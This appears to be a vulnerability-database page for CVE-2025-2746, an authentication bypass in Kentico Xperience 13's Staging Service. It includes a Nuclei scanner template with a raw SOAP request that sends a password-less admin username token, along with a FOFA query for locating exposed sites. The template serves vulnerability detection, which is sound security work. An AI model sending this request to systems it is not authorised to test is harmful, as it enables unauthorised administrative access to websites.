| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2025-2746 | 24 Mar 202519:40 | ā | circl | |
| Kentico Xperience CMS Authentication Bypass Using an Alternate Path or Channel Vulnerability | 20 Oct 202500:00 | ā | cisa_kev | |
| CISA Adds Five Known Exploited Vulnerabilities to Catalog | 20 Oct 202512:00 | ā | cisa | |
| Kentico Xperience å®å Øę¼ę“ | 24 Mar 202500:00 | ā | cnnvd | |
| Kentico Xperience Authentication Bypass Vulnerability (CNVD-2026-05134) | 28 Mar 202500:00 | ā | cnvd | |
| CVE-2025-2746 | 24 Mar 202518:16 | ā | cve | |
| CVE-2025-2746 Kentico Xperience <= 13.0.172 Staging Sync Server Digest Password Authentication Bypass | 24 Mar 202518:16 | ā | cvelist | |
| EUVD-2025-8008 | 3 Oct 202520:07 | ā | euvd | |
| Kentico Xperience < 13.0.173 Auth Bypass | 23 Oct 202500:00 | ā | nessus | |
| CVE-2025-2746 | 24 Mar 202519:15 | ā | nvd |
id: CVE-2025-2746
info:
name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
author: DhiyaneshDK
severity: critical
description: |
Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
impact: |
Unauthenticated attackers can bypass authentication in the Staging Service using any username (or valid username depending on hotfix version), potentially gaining control of administrative objects and compromising the entire CMS.
remediation: |
Upgrade to Kentico Xperience 13 Hotfix 178 or later that properly validates Staging Service authentication.
reference:
- https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
- https://devnet.kentico.com/download/hotfixes
- https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2746
cwe-id: CWE-287
epss-score: 0.58431
epss-percentile: 0.98984
metadata:
verified: true
max-request: 1
fofa-query: app="Kentico-CMS"
tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev
variables:
rand: "{{to_lower(rand_text_alpha(32))}}"
http:
- raw:
- |
POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: text/xml; charset=utf-8
SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
</wsse:UsernameToken>
</wsse:Security>
</soap:Header>
<soap:Body>
<ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
<stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
</ProcessSynchronizationTaskData>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{rand}}"
- "<wsa:Action>"
condition: and
- type: word
part: body
words:
- "Site not running"
- "SyncServer.ErrorLicense"
- "SyncServer.ErrorServiceNotEnabled"
- "Staging service is not enabled on this server"
- "Staging does not work with blank password"
- "Missing X509 certificate token"
- "The security token could not be authenticated or authorized"
condition: or
negative: true
- type: word
part: content_type
words:
- "text/xml"
# digest: 4a0a00473045022100c93985cca8ba9c37d3bfc54436d702bed4caa2d24df03e5a4e90e4e881e1b5d002206f3387b3227951a5ab697fe33082151f291bd712942b7dc44ac925924ee7e48e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation